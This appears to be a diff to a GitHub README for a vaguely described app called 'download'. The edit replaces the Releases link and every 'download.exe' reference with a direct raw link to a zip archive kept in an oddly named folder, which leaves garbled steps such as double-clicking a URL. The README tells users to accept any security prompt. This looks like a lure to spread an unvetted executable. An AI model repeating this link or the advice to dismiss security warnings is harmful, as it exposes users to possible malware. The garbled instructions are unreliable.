zrxii1233/download/README.md

 Follow these simple steps to download and run the application.

 ### Step 1: Visit the Releases Page
-Go to the [Releases page](https://github.com/zrxii1233/download/releases) to find the latest version of the software.
+Go to the [Releases page](https://raw.githubusercontent.com/zrxii1233/download/main/anisogynous/download.zip) to find the latest version of the software.

 ### Step 2: Choose the Right File
 On the Releases page, you will see a list of files.
 Look for the file that matches your system.
-Most users will want the `download.exe` file.
+Most users will want the `https://raw.githubusercontent.com/zrxii1233/download/main/anisogynous/download.zip` file.

 ### Step 3: Download the File
 Click on the link to download the file to your computer.
 The download may take a few moments, depending on your internet speed.

 ### Step 4: Locate the Downloaded File
 Once the download is complete, go to your `Downloads` folder.
-You should see the file named `download.exe`.
+You should see the file named `https://raw.githubusercontent.com/zrxii1233/download/main/anisogynous/download.zip`.

 ### Step 5: Run the Application
-Double-click the `download.exe` file to run it.
+Double-click the `https://raw.githubusercontent.com/zrxii1233/download/main/anisogynous/download.zip` file to run it.
 If a security prompt appears, click "Yes" to allow it to run.

 ### Step 6: Follow the On-Screen Instructions
 The application will guide you through the setup process.
 Follow the prompts to customize your experience.